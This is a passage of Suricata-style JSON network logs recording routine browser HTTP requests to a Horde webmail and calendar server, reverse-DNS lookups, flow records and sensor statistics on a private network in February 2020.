rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":5}} 
{"timestamp":"2020-02-29T00:19:47.985315+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:19:47.985584+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:19:47.985593+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} 
{"timestamp":"2020-02-29T00:19:47.985546+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:19:47.985564+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:19:47.985684+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} 
{"timestamp":"2020-02-29T00:19:48.131634+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":2}} {"timestamp":"2020-02-29T00:19:48.131778+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":3}} {"timestamp":"2020-02-29T00:19:48.132056+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:19:48.132118+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:19:49.677172+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:19:49.688948+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:49.965665+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:19:50.000242+0000","flow_id":7712368340100,"event_type":"flow","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.044164+0000","end":"2020-02-29T00:14:49.152103+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:19:50.000430+0000","flow_id":1980751639961820,"event_type":"flow","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":9241,"start":"2020-02-29T00:18:43.876764+0000","end":"2020-02-29T00:18:49.567494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:50.000900+0000","flow_id":2108866204128541,"event_type":"flow","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.316701+0000","end":"2020-02-29T00:14:49.421564+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.230923+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:19:50.252004+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31396,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} 
{"timestamp":"2020-02-29T00:19:50.482275+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.490777+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52820,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.628321+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17689,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} 
{"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:19:51.059913+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":3}} {"timestamp":"2020-02-29T00:19:51.060200+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:19:51.201868+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":4}} {"timestamp":"2020-02-29T00:19:51.202349+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:19:51.389548+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":5}} {"timestamp":"2020-02-29T00:19:51.389808+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} 
{"timestamp":"2020-02-29T00:19:52.000478+0000","event_type":"stats","stats":{"uptime":14844,"capture":{"kernel_packets":137111,"kernel_drops":0},"decoder":{"pkts":137114,"bytes":94109551,"invalid":192,"ipv4":135575,"ipv6":10,"ethernet":137114,"raw":0,"null":0,"sll":0,"tcp":130102,"udp":5266,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2829,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2845,"synack":2836,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1866,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2410,"failed_udp":112},"tx":{"http":4776,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2492}},"flow_mgr":{"closed_pruned":2801,"new_pruned":17,"est_pruned":2464,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20176,"memcap_state":0,"memcap_global":0},"http":{"memuse":322476,"memcap":0}}} 
{"timestamp":"2020-02-29T00:19:52.944295+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":3}} {"timestamp":"2020-02-29T00:19:52.944595+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":6}} {"timestamp":"2020-02-29T00:19:52.944695+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":2}} {"timestamp":"2020-02-29T00:19:52.946829+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":6}} {"timestamp":"2020-02-29T00:19:53.000739+0000","flow_id":1936470511985381,"event_type":"flow","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:52.729829+0000","end":"2020-02-29T00:14:52.835054+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:53.120559+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17640,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
